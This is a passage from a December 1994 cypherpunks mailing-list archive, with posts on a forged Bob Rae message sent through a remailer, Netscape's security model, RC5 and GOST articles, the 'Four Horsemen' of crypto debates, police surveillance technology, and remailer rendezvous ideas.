how do we subscribe? Let us know, Sameer! - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLusxRyoZzwIn1bdtAQEzugGA0qpI3qGADLNL6cR70de+syh24r3I2rT3 zdEkgeq28mdQBDj8RkznVYR4q4ZUBVRh =jzKL -----END PGP SIGNATURE----- From werewolf at io.org Sun Dec 11 09:13:37 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 11 Dec 94 09:13:37 PST Subject: Storm Brewing Over Forged Bob Rae Posting? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Anybody taken note of the ruckus about a forged posting from Bob Rae (the premier of the Canadian province of Ontario)? Seems like some joker posted a fake message from Rae through Hal's remailer at portal. Now all the lame press (and some even LAMER USENET readers) are screaming foul. I bet there will be renewed interest in the cypherpunk remailer's in the next few days :> -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLusyQnBFBj7pSNyhAQHmhwf/YsmkqGBE+9o/m37BVZc/eztTXjZK/DF/ mwV4MnrqhwMXGax7+AEvfiPkI9yv2Q2Y65t9Tx0QRyZk3V9ISg1zi+cHBso4VI0A zzc2lsjFpopZbTsRujwFFLc3Spj46GJSLhxEnI6UW0k+TI6MpfaT3s2Di3m3XxZs S3dwFgAJumb/Be/h4fEBBbJqvRz3znHO9uCpmsICkijrnBlLd/hF/+L7RbTBuPKH cMW0HWCTXgneFkli+tGlSI8qjDSiIP2YMnZRFFl9ykOvw130b/+UTmeM+0+yrnPX fzdFyJAQQMER5nn/bP3ML5mSbyqZ7pW7k0AH9V6oeccSGj6Zmbvm0w== =Qe95 -----END PGP SIGNATURE----- From eric at remailer.net Sun Dec 11 09:43:02 1994 From: eric at remailer.net (Eric Hughes) Date: Sun, 11 Dec 94 09:43:02 PST Subject: "Crypto Anarchy and Virtual Communities" In-Reply-To: <199412110919.BAA10461@netcom6.netcom.com> Message-ID: <199412111840.KAA28398@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) I hate to put files in my ftp account, as Netcom's ftp site is grossly overcrowed and nearly all attempts to access it fail. (Netcommies are roadkill on the I-way.)) Tim May, famous net.commie. Uh, wait, ... Eric From alano at teleport.com Sun Dec 11 10:25:51 1994 From: alano at teleport.com (Alan Olsen) Date: Sun, 11 Dec 94 10:25:51 PST Subject: A few articles of interest... Message-ID: <199412111825.KAA24116@desiree.teleport.com> For those who have not seen it... The January 1995 issue of Dr. Dobbs has tw articles of interest. - Bruce Schneier has an article on GOST. (A Soviet varient on DES.) - An article on RC5 by Ron Rivest! (Which includes source code!) Dr. Dobbs has had a number of good crypto related articles as of late. (Having a regular column by Bruce Scheier could be part of it...) Also, for those who are interested in Windows 95 (users 0)... Andrew Schulman has an article on Windows 95 from the inside. (This is part of his new book and the reason he got kicked off of the beta team.) Interesting reading. | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From amanda at intercon.com Sun Dec 11 10:35:53 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 10:35:53 PST Subject: BofA+Netscape Message-ID: <199412111835.NAA26734@intercon.com> > Would you mind elaborating? Sure. Netscape has managed to alienate many IETF working groups, including HTML, HTTP Security, IP security, and so on by implementing and distributing half-cooked "extensions" to HTML & HTTP without a lot of forethought. As a result, they've greatly multiplied existing interoperability problems, and created a very confused environment in precisely those areas that most need standardization and consensus (security and HTML itself). That help? --Amanda From m5 at vail.tivoli.com Sun Dec 11 10:53:34 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Sun, 11 Dec 94 10:53:34 PST Subject: A few articles of interest... In-Reply-To: <199412111825.KAA24116@desiree.teleport.com> Message-ID: <9412111853.AA10303@vail.tivoli.com> Alan Olsen writes: > - An article on RC5 by Ron Rivest! (Which includes source code!) I'm still very curious as to how the applied-for patent on RC5 protects the algorithm. Perhaps it just protects the RC5 algorithm family specifically, the idea being that if it becomes very popular then anyone implementing it for compatibility reasons will be forced to purchase a license to do so. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From klbarrus at owlnet.rice.edu Sun Dec 11 11:03:22 1994 From: klbarrus at owlnet.rice.edu (Karl Lui Barrus) Date: Sun, 11 Dec 94 11:03:22 PST Subject: "Crypto Anarchy and Virtual Communities" In-Reply-To: <199412110919.BAA10461@netcom6.netcom.com> Message-ID: <9412111902.AA01983@snowy.owlnet.rice.edu> Timothy C. May wrote: >I hate to put files in my ftp account, as Netcom's ftp site is >grossly overcrowed and nearly all attempts to access it fail. >(Netcommies are roadkill on the I-way.)) But it is there, at >ftp.netcom.com, in pub/tc/tcmay. I have managed to obtain this file, and have placed at the gopher site. Now, chaos.bsu.edu has recently moved to chaos.taylored.com, which is still a "host unknown" for me. But, using its ip address works just fine "gopher 204.95.228.28". Actually, "gopher chaos.bsu.edu" still works for me, but this is supposed to change by January... Anyway, the file in the Essays directory as "Crypto Anarchy and Virtual Communities". One (or more) of the following should work: gopher://chaos.taylored.com/Cypherpunks Gopher Server/ gopher://204.95.228.28/Cypherpunks Gopher Server/ gopher://chaos.bsu.edu/Cypherpunks Gopher Server/ and then look in Essays/Crypto Anarchy and Virtual Communities -- Karl L. Barrus: klbarrus at owlnet.rice.edu 2.3: 5AD633; D1 59 9D 48 72 E9 19 D5 3D F3 93 7E 81 B5 CC 32 2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5 E8 97 64 7E 20 95 60 D9 "One man's mnemonic is another man's cryptography" - K. Cooper From mailbot at sled.com Sun Dec 11 11:17:47 1994 From: mailbot at sled.com (SLED) Date: Sun, 11 Dec 94 11:17:47 PST Subject: Four11 Free Listing Thank You - KEEP THIS MESSAGE! Message-ID: <199412111920.LAA18531@ayn.sled.com> ========================================================================== _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| FREE LISTING THANK YOU _____ / /__/ /__/ / \ _|_ _|_ KEEP THIS MESSAGE! ========================================================================== THANKS Thanks for adding your listing to the Four11 Online User directory. We hope you find this directory a helpful resource and we encourage you to send any comments about the service to comments at Four11.com. If the directory puts you in contact with a lost friend or colleague, please let us know. Please send your friends a copy of our free listing form or direct them to our home page at URL http://www.Four11.com/. YOUR PASSWORD Below is your password. PLEASE KEEP A RECORD OF YOUR PASSWORD IN A SAFE PLACE. You will need it for searching the directory, changing your listing, and accessing other free services. You can change your password by sending an e-mail to change at Four11.com. Remember to include you current password as the body of the message. Your password is "thibsi". YOUR LISTING Your listing will appear in the directory, usually within 24 hours, but you can access the directory immediately. For complete information on the services now available to you, send an e-mail to info at Four11.com. TO SEARCH To search the Online User Directory, connect to our Web page at URL http://www.Four11.com/ or request an e-mail search form by sending an e-mail to finduser at Four11.com. TO OBTAIN SOMEONE'S PGP KEY To obtain someone's PGP Public Key, connect to our Web page at URL http://www.Four11.com/ or send an e-mail to key at Four11.com and include the person's e-mail address as the body of the message. ========================================================================== * Online User Directory * PGP Key Server * _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| info at Four11.com _____ / /__/ /__/ / \ _|_ _|_ http://www.Four11.com/ SLED Corporation * humans at sled.com * (415)323-2508 * Fax: (415)326-0730 ========================================================================== (c) 1994 SLED Corporation, All Rights Reserved chief nerd has spoken From mailbot at sled.com Sun Dec 11 11:17:52 1994 From: mailbot at sled.com (SLED) Date: Sun, 11 Dec 94 11:17:52 PST Subject: Four11 Membership Form Message-ID: <199412111920.LAA18534@ayn.sled.com> ========================================================================== _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| MEMBERSHIP FORM _____ / /__/ /__/ / \ _|_ _|_ ========================================================================== In response to your recent request for free access to the Four11 Online User Directory, you have been sent two messages via e-mail. The first message includes your password and this message is the second. If you do not receive your password within 24 hours, please contact us at support at Four11.com. We hope you find the Online User Directory a helpful resource. If you find this service useful and wish to support it as well as take advantage of additional features, please consider becoming a member. A Four11 membership provides the following benefits: + Expanded Listing With Alternative Names And Display Message + Additional Group Connections + Search Agents + PGP Public Key Certification And Storage On Key Server + Hot Link To A Personal Web Page If you wish to become a member ($20.00 USD), follow the instructions on this form. If you wish to learn more about these benefits, send an e-mail to info at Four11.com. ========================================================================== PGP USERS If you are a PGP user and wish to store your public key on our key server, request a special membership form by sending an e-mail to upgrade-pgp at Four11.com. All others should use this form. ========================================================================== THREE STEPS TO A MEMBERSHIP 1. Pay a sign-up fee ($20.00 USD) which also covers the first year of service. (Our current yearly renewal is $10.00.) 2. Receive a notification from us via e-mail. 3. Enjoy your member benefits. ========================================================================== PICK A PAYMENT OPTION BELOW: TO SIGN-UP BY PHONE (VISA and MASTERCARD ONLY) Call (415) 323-2508 BEFORE CALLING, please read the Acceptable Use Policy below. TO SIGN-UP BY FAX OR MAIL (VISA, MASTERCARD, OR CHECK) 1. Print a copy of this form and follow the remaining instructions. 2. Read the Acceptable Use Policy at the end of this form. 3. Please check the name and e-mail address below. If not correct, CLEARLY print the correct information in the space to the right. Please do not cross out the original information. Name: Anne E Mous Primary E-Mail Address: cypherpunks at toad.com 4. Print Your Day Time Phone Number Clearly: ____________________________ (In case there is a problem with your order.) 5a. If you are paying by credit card: Total Charges: $20.00 USD ( ___MC, ___ VISA ) Credit Card No. (PRINT CLEARLY): ______________________________________________________________________ Expiration Date:_______________________ Signature:____________________________________________________________ Fax this entire form to (415) 326-0730 or mail it to: SLED Corporation PO Box 309 Redwood City, CA 94064 5b. If you are paying by check: Mail this entire form with a check for $20.00 USD ($27.00 CAN) to: SLED Corporation PO Box 309 Redwood City, CA 94064 When we have processed your payment, we will send a notification to your primary e-mail address. Thanks for your business! ACCEPTABLE USE POLICY Four 11 Directory Services are offered by SLED subject to rules governing the use of these systems and related services. By subscribing to and using Four11 Directory Services, you agree to pay all applicable fees and to abide by this Acceptable Use Policy and applicable rules. 1. You agree to use your own name and other personal information. 2. You agree to not use the system for any purpose that is illegal. 3. You agree to not use the directory to contact persons in a way that they find objectionable. 4. You agree to not copy information from the database for commercial purposes and/or financial gain. 5. SLED reserves the right to terminate a users access to the system. 6. SLED makes no warranties. Additional information can be obtained by requesting our FAQ (send an e-mail to faq at Four11.com or connect to URL http://www.Four11.com/). If you have any legal questions or concerns, please read the FAQ. ========================================================================== * Online User Directory * PGP Key Server * _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| info at Four11.com _____ / /__/ /__/ / \ _|_ _|_ http://www.Four11.com/ SLED Corporation * humans at sled.com * (415)323-2508 * Fax: (415)326-0730 ========================================================================== (c) 1994 SLED Corporation, All Rights Reserved chief nerd has spoken From DarScott at aol.com Sun Dec 11 11:55:08 1994 From: DarScott at aol.com (DarScott at aol.com) Date: Sun, 11 Dec 94 11:55:08 PST Subject: Children's Books Mentioning Privacy Message-ID: <941211145500_3311823@aol.com> On Tuesday I will be giving a talk on Children's Books with Freedom Themes, but I have not found anything on e-mail privacy or privacy in general. Any suggestions? Fiction or Nonfiction. Dar Scott From mpd at netcom.com Sun Dec 11 12:32:45 1994 From: mpd at netcom.com (Mike Duvos) Date: Sun, 11 Dec 94 12:32:45 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: Message-ID: <199412112031.MAA21646@netcom12.netcom.com> > Now all the lame press (and some even LAMER USENET readers) are screaming > foul. I bet there will be renewed interest in the cypherpunk remailer's in > the next few days :> I suppose this means we need strong laws against "message laundering." -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From tcmay at netcom.com Sun Dec 11 12:37:27 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 12:37:27 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: Message-ID: <199412112037.MAA16882@netcom18.netcom.com> Mark Terka wrote: > Anybody taken note of the ruckus about a forged posting from Bob Rae (the > premier of the Canadian province of Ontario)? Seems like some joker posted > a fake message from Rae through Hal's remailer at portal. > > Now all the lame press (and some even LAMER USENET readers) are screaming foul. > I bet there will be renewed interest in the cypherpunk remailer's in the next > few days :> Thanks for mentioning this, but I had some trouble finding it in the *.canada.* newsgroups. I found it in "ont.general" after seeing mention of the controversy in "alt.anonymous." The newspaper article cites comments from a manager at Portal, denyning responsibility, so we _may_ be seeing some repercussions. (I have no idea if Hal has been contacted...perhaps he can comment here.) In other news, seen in the various anon server groups, there's a raging debate about some remailers censoring^H^H^H^Hscreening for content, and not passing on (plaintext, obviously) messages they dislike, or think are offensive, or insulting/supportive of Scientology, etc. (I haven't read the Scientology debate yet, but apparently a remailer named "Homer" is involved, one way or another.) Once again, and not for the last time, it is critical that *remailer-hosting sites* be placed at arms-length from *specific instances of remailer accounts*. To put it more simply, a site like c2.org could offer _dozens_ of remailer accounts. (The site owner is not supposed to look at mail, according to the ECPA...in my non-lawyerly view, this provides valuable protection for the site owner. Not for the remailer account owners, but, then, they are presumably acquired through pseudonyms, aren't they?) In yet another piece of news, Netcom has apparently been hacked/attacked rather badly. The "netcom.general" discussion group (local to Netcom) is filled with garbage posts, forged posts, cancelled articles, etc. Messages about "root" being forged appeared, then disappeared. Netcom is quiet on this, but has been running "crack" on all of their machines for the last several days--apparently to (somehow?) help to find security flaws....I have no idea why running crack to find weak passwords of users is such a high priority. Maybe the apparent attack is related, maybe not. News has basically stopped flowing into Netcom, and mail is still somewhat squirrelly. Phil Karn asked me if the "Internet Liberation Front" was/is my doing. Nope. (The ILF--not to be confused with the "Information Liberation Front," which I may or may not know something about--was apparently claiming to have cracked some other online service providers. I don't know if the current situation at Netcom is related to this.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From amanda at intercon.com Sun Dec 11 13:21:11 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 13:21:11 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412111620.AA41983@eldamar.walker.org> Several people have asked me to clarify my recent comments about Netscape. I am more than happy to oblige. First of all, let me begin by saying that I am a biased observer, and that all of this is my personal opinion. My annoyance with Netscape is also closer to the surface this week than it normally is, due to a variety of factors (including having just returned from the San Jose IETF meeting). My initial comment, and the ones that follow in this message, are thus more frank than is my usual style on, say, public Usenet newsgroups. That being said, here are some of the data that has gone into my impressions of Netscape so far. (1) Netscape plays very fast and loose with HTML. Rather than participating in the existing standardization efforts, they have indiscriminately added "extensions" to it that are not supported by any other client software, and which in some cases go directly against HTML's markup-oriented structure. This only adds more confusion to an already muddy area, delays the prospects for a standard HTML specification, and divides the WWW into "WWW Classic" and "Netscape-compatible". Personally, as a strong proponent of universal interoperability, I find this reprehensible. There is no need to bypass existing efforts just to add cosmetic value to your own software. (2) The Netscape Secure Sockets proposal has an extremely poor security model. It is not an end-to-end security model, but rather relies on transport level security, which is in my view dangerously inadequate for reasons which should be obvious to most of the folks on this list. It is also tied directly to the RSA certification hierarchy. Now, for those of us who have X.509 certificates rooted in the RSA Commercial Certification authority, that's fine, but it also means that any other WWW client that wishes to interoperate with Netscape's "secure servers" must license TIPEM from RSA Data Security, and consequently pay RSA's rather high royalties, unless the software is free (in which case RSAREF can be used). This serves as a direct barrier to competition from other commercial vendors. This is not all bad--I happen to like RSADSI's products and technology--but promoting a transport-level security system instead of an end-to-end one is to my mind simply irresponsible. There has been no peer review of Netscape's security model--it was simply implemented by fiat, without regard for the IETF standards process. I find that this leaves a very bad taste in my mouth. I also heard similar sentiments from a wide variety of other attendees at the IETF, including members of the IP Security working group, people who attended the Secure HTTP BOF, and others. This leads me to believe that it's not just a matter of me leaping to wild conclusions. (3) Netscape is viewed as a "loose cannon" by most of the other commercial players in the WWW arena, mainly because they have introduced a fair amount of FUD into the HTML standardization effort, while simultaneously promoting themselves as being standards-based. Members of Apple's "Cyberdog" project and Microsoft's web projects, who *are* trying to contribute to the standards process, had particularly excoriating things to say in this regard. Now, as I said, I am biased and my comments about Netscape are strictly my person opinions. I will be perfectly willing to revise these opinions as I receive more data. For example, if Netscape takes a more active part in the standards process, works with RSA to secure wider availability of the underlying technology required by their proposals, and generally demonstrates a willingness to play nicely with other children, that would be great, and I'll just as strongly defend them as I am panning them now. However, in my view, they have not shown a good initial track record. Only time will tell. Amanda Walker InterCon Systems Corporation From asgaard at sos.sll.se Sun Dec 11 13:32:38 1994 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Sun, 11 Dec 94 13:32:38 PST Subject: The Four Horsemen Message-ID: >From the recent essay "Anarchy" by T.C. May: The use of encryption by "evil" groups, such as child pornographers, terrorists, abortionists, abor- tion protestors, etc., is cited by those who wish to limit civilian access to crypto tools. We call these the "Four Horsemen of the Infocalypse", as they are so often cited as the reason why ordinary citizen-units of the nation-state are not to have access to crypto. A problem with the Four Horsemen is the various definitions currently in use on the Net. Two of them are generally agreed upon: Drug Dealer and Terrorist. Usually either Pedophile or Pornographer is the third. The fourth varies the most: Tax Evader, Spy etc. Abortionist and Abortionist-Killer are new prospects. Who were the Original Four? (No, I'm not asking about White, Red, Black and Pale.) Mats quit From crawford at scruznet.com Sun Dec 11 13:44:38 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Sun, 11 Dec 94 13:44:38 PST Subject: Real-time surveillance of the police Message-ID: <199412112144.NAA09211@scruz.net> -----BEGIN PGP SIGNED MESSAGE----- In the December '94 issue of Wired, ("Watching the Detectives", p. 141), Sandy Sanfort describes Bob Fleming's work to make real-time permanent recordings of the body positions of police officers. One could place a small sensor on each wrist and ankle, and record the positions (and velocities) of the cops body to with a _centimeter_, anywhere in a city. The advantage for cops is that a fallen officer can be quickly located, and a cop's claim to have witnessed an event can be corroborated by demonstrating that he was actually there. The advantage for society is that the cop's behaviour, such as billy-club swinging velocity, can be monitored. It could detectgunfire, too, by measuring the kick that is transmitted down the cop's wrist. This would work to the extent that the equipment is actually mounted on the cop it claims to belong to, so some manner of authentication would be needed. Also discussed is the idea of car or helmet mounted cameras, transmitting images continuously, to be stored by a neutral third-party, in the event of a legal challenge, either from the accused claiming that the cop is lying, or of claims of police brutality. After the Rodney King incident, I had the notion, (which I did not act on to actually promote, I'm sorry to say), that organizations representing people that feel persecuted by the law could issue disposable cameras to all there members. For example, if a street gang felt the cops were thumping their members with unwarranted enthusiasm, the gang could purchase a case of cameras at the local Price Club, and everyone could carry them to photograph the cops. In addition, cameras could be unobtrusively mounted on car hoods, perhaps with three or four such cameras multiplexing their images onto a single videotape (one wants a wide, but not necessarily tall aspect ratio; three such cameras with fisheye lenses could cover the hole perimer of a car). The VCR would be in a fireproof safe welded to the car frame (or use a surplus flight recorder package), so it would take extra effort for a cop to conceal the evidence of wrongdoing after mistreating the driver. It would also be handy for assigning responsibility in traffic accidents. Yes, that's right - keep surveillance cameras going on _yourself_. If you're not doing anything illegal, you've got nothing to fear from taping everything you do. Of course, after the difficulty the City of Santa Cruz had in establishing a Police Review commission, and considering that its powers were eviscerated in light of a lawsuit threat by a police union, I expect that it will be difficult to convince our Nation's Finest to adopt this new technology - though I'm sure they'd be happy to apply it to parolees and those serving on probation. Adoption could be initially achieved, though, by pointing out to private security firms that their liability could be reduced by monitoring their employees - obvious slackers could be immediately fired, troublesome guards could be disciplined, and the firm could demonstrate in court that the guard was nowhere near the scene when the plaintiff claimed to have been beaten by a guard. Private security guards have nowhere near the influence that police unions do, and so would have little power in arguing against it. Later on, cities faced with expensive lawsuits could strike a deal with the liability insurance companies to save money if the city cops use this stuff. After the DT fiasco, and the mention yesterday of the DOJ's new Big Brother Database, I thought you'd like to hear that someone's working on giving Big Bro the stick too. I personally feel that a society that _needed_ to do this to its cops is an abhorrent society. But perhaps we could strike a deal with Big Bro - if you don't tap our phones, we won't pass laws to tap your cops. Best Wishes in this Holiday Season, -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLusCMKJTibhK6XY5AQF+IAP+MCHtgnCbJc96lrOcoNt0HWal4nNF7JVN t6qIM6DDdGp5+IEimHTzgkUlUSZ4ojcIYEbjaae8Q58VRMOQ9zFaZlIWSeTTgZiQ wXIicZJreKeonTI0mwZauAbtmuEy3vWRp19Qf2fYwaMOY3QLy1vhTgG7g2iRpccI T6YspCxcYdw= =YK34 -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCPAy7JYr8AAAEEAJ4GpoYcH5abkSq5FZQ9LxoP9oKKQDXHRGZT8QCcnVZ8o87H p9kEaUJIyzGbMHpO7C09qShwcrII2VfCZ77iWlBglmdLEa/dKXRCSWMFF52RcSDh zJF8m0wE2SZ9x4Y6KuXM3RwJVdEKLhsAImxckvfj0UBvb5xtJ6JTibhK6XY5ABEB AAG0LU1pY2hhZWwgRC4gQ3Jhd2ZvcmQgPGNyYXdmb3JkQHNjaXBwLnVjc2MuZWR1 PokAVQMFEC7p5d9yRW2Du2TJYQEB7YMB/2ToOoN7aVNUnGyykxKAVjvMDcMGgSPM IR3+wUqzpAyH43tEwKBHStYj2jSlHimRXWi6lpvSwZ7rKsOtQoeSlnCJAJUDBRAu yWQXolOJuErpdjkBAaRSA/48+f7RqKXbsLJIEx8b0A0XuA/671B6L7PiC3BS5kMh QtIlRxFlgTLUp03D2TlbEyqoaJwwIjE71k3+V2rM712WGiDlQSRjtrU21/QDNzbZ C48r+pUBO7bLHe/16ED8tgsSONH+7DIdQGw6uN1v4aTiOk2HxgDHGa3RjEewbrfW 2w== =bZwx -----END PGP PUBLIC KEY BLOCK----- Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From tcmay at netcom.com Sun Dec 11 13:45:02 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 13:45:02 PST Subject: The Four Horsemen In-Reply-To: Message-ID: <199412112144.NAA08154@netcom4.netcom.com> Mats Bergstrom wrote: > >From the recent essay "Anarchy" by T.C. May: > > The use of encryption by "evil" groups, such as > child pornographers, terrorists, abortionists, abor- > tion protestors, etc., is cited by those who wish to > limit civilian access to crypto tools. We call these the > "Four Horsemen of the Infocalypse", as they are so > often cited as the reason why ordinary citizen-units > of the nation-state are not to have access to crypto. > > A problem with the Four Horsemen is the various definitions > currently in use on the Net. Two of them are generally agreed > upon: Drug Dealer and Terrorist. Usually either Pedophile or > Pornographer is the third. The fourth varies the most: Tax > Evader, Spy etc. Abortionist and Abortionist-Killer are new > prospects. > > Who were the Original Four? (No, I'm not asking about White, I probably should have been more careful in explicitly listing the "main candidates" for the Four Horsemen: - Terrorists - Drug Dealers - Money Launderers - Child Pornographers Others may have different lists, but these are the main "threats" suggested by most. My reference to "abortionists, abortion protestors" was to show that _both_ sides of the issue consider the other side to be a threat. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From anonymous-remailer at shell.portal.com Sun Dec 11 13:53:11 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 11 Dec 94 13:53:11 PST Subject: What Happened to Xenon ? Message-ID: <199412112152.NAA01048@jobe.shell.portal.com> Anybody know what became of Xenon ( qwerty at netcom.com ) ? I did a finger of his account and got back unknown user ... He seemed like somebody who was in the spot light , funny that he just dropped out of sight . ^X From cactus at seabsd.hks.net Sun Dec 11 13:58:13 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Sun, 11 Dec 94 13:58:13 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: <199412112203.RAA24716@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Seems to me that one of the fundamental building blocks necessary to a host of anonymous services is a means of rendezvousing in a manner that is not vulnerable to traffic analysis. The obvious solution to this is through the use of a broadcast medium. Has anybody created an alt.* group purely for remailer-associated rendezvous? If not, it seems like that would be a very worthwhile direction to pursue: with such a mechanism, nodes of a "remailer net" can surface and disappear with minimal disruption to the net. Folks spend a lot of time bemoaning the transience of specific instances of remailer nodes: why not turn this into an advantage by architecting a network of system that is resilient against the destruction and/or compromise of individual nodes? - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLut3AioZzwIn1bdtAQHocwGAq/KWiFGi2nJ4Kuve/0jUv1xX5aAJknWc NRfJUts3Y0PfKZZbSETEwYPNfX48O4TB =NIBb -----END PGP SIGNATURE----- From tcmay at netcom.com Sun Dec 11 14:05:23 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 14:05:23 PST Subject: Real-time surveillance of the police In-Reply-To: <199412112144.NAA09211@scruz.net> Message-ID: <199412112204.OAA10552@netcom4.netcom.com> Michael D. Crawford wrote: > In the December '94 issue of Wired, ("Watching the Detectives", p. 141), > Sandy Sanfort describes Bob Fleming's work to make real-time permanent > recordings of the body positions of police officers. > > One could place a small sensor on each wrist and ankle, and record the > positions (and velocities) of the cops body to with a _centimeter_, > anywhere in a city. As it happens, I'm a investor in Bob Fleming and Cherie Kushner's start-up company. (One of several investors.) I've known them for several years and have visited their lab/home many times. (It was at their party that I got to spend a day talking to Vernor Vinge, as some of you may recall me commenting on.) So, I'd like to comment on some of these points. > The advantage for cops is that a fallen officer can be quickly located, and > a cop's claim to have witnessed an event can be corroborated by > demonstrating that he was actually there. Bob and Cherie _cringe_ when I joke about their loalizers being the basis of the nation's "position escrow system." They fully understand the ramifications and potential abuses of a system which could allow position tracking to a few meters of every citizen-unit in a country. (And a huge early market is expected to be "child localization," a la the child-minder beacons some parents are already attaching to their children. Bob and Cherie's system is much smaller, cheaper, etc. > After the Rodney King incident, I had the notion, (which I did not act on > to actually promote, I'm sorry to say), that organizations representing > people that feel persecuted by the law could issue disposable cameras to > all there members. For example, if a street gang felt the cops were This was an idea explored in detail by David Brin in 1990 in his novel "Earth." Video cameras are ubiquitous and have a major effect on casual street crime. ... > Yes, that's right - keep surveillance cameras going on _yourself_. If > you're not doing anything illegal, you've got nothing to fear from taping > everything you do. This scenario is a likely way that "position escrow" will evolve, from a voluntary escrowing (incl. timestamping, etc.). "Those with nothing to hide" will agree to escrow their movements...this will exculpate them in suspected crimes, etc. A slippery slope. On the topic of how these localizers actually work, I'm not at liberty to talk about the technology. It's novel, and uses a *lot* if digital signal processing. It doesn't use GPS and it's not a variant of cellular telephones. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From tcmay at netcom.com Sun Dec 11 14:11:22 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 14:11:22 PST Subject: Broadcasts and the Rendezvous Problem In-Reply-To: <199412112203.RAA24716@bb.hks.net> Message-ID: <199412112210.OAA10976@netcom4.netcom.com> L. Todd Masco wrote: > Seems to me that one of the fundamental building blocks necessary to > a host of anonymous services is a means of rendezvousing in a manner that > is not vulnerable to traffic analysis. > > The obvious solution to this is through the use of a broadcast medium. > Has anybody created an alt.* group purely for remailer-associated > rendezvous? Isn't this what "alt.anonymous.messages" is all about? (It's been at my Netcom site for many months now...I don't recall who created it, but it seems to me it was one of us.) Miron Cuperman ran a message pool for a while....I don't know the current status. Other options exist, but all are lightly-trafficked. When more users are using them, expect more such places. > Folks spend a lot of time bemoaning the transience of specific instances > of remailer nodes: why not turn this into an advantage by architecting > a network of system that is resilient against the destruction and/or > compromise of individual nodes? I'm not sure what you mean by this. More remailers are always a good thing, and offshore sites are especially good, but I'm not sure what you mean by your last point. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From steven at echonyc.com Sun Dec 11 14:23:26 1994 From: steven at echonyc.com (Steven Levy) Date: Sun, 11 Dec 94 14:23:26 PST Subject: comments on emoney story Message-ID: <199412112221.RAA17990@echonyc.com> There's been a few comments about my Emoney story in the December WIRED and I thought I'd clarify a couple of things. FROM JOHN YOUNG: >And, yes, for the Chaum-uncharmed, Mr. Chaum was rude to Mr. >Levy. Whether Mr. L. is rude in kind to Mr. C. is an exercise >left to the reader. For the record, I didn't consider Chaum rude to me. Actually our 